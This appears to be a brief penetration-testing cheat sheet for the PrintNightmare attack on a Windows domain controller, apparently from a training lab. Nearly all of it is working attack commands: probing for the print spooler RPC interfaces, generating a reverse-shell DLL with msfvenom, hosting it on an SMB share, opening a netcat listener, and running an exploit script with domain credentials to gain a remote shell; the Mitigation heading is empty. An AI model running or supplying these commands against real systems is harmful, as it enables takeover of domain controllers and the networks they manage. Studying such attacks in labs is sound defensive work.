PrintNightmare
Overview
PrintNightmare Attack
Check if the Domain Controller is vulnerable
rpcdump.py @192.168.1.129 | egrep 'MS-RPRN|MS-PAR'Desired Output
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote ProtocolGenerate malicious DLL, host it and start listener
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=1337 -f dll > shell.dll
smbserver.py share `pwd` -smb2support
nc -lnvp 1337python3 printnightmare.py pnpt.local/greg:[email protected] '\\192.168.1.11\share\shell.dll'Mitigation
Last updated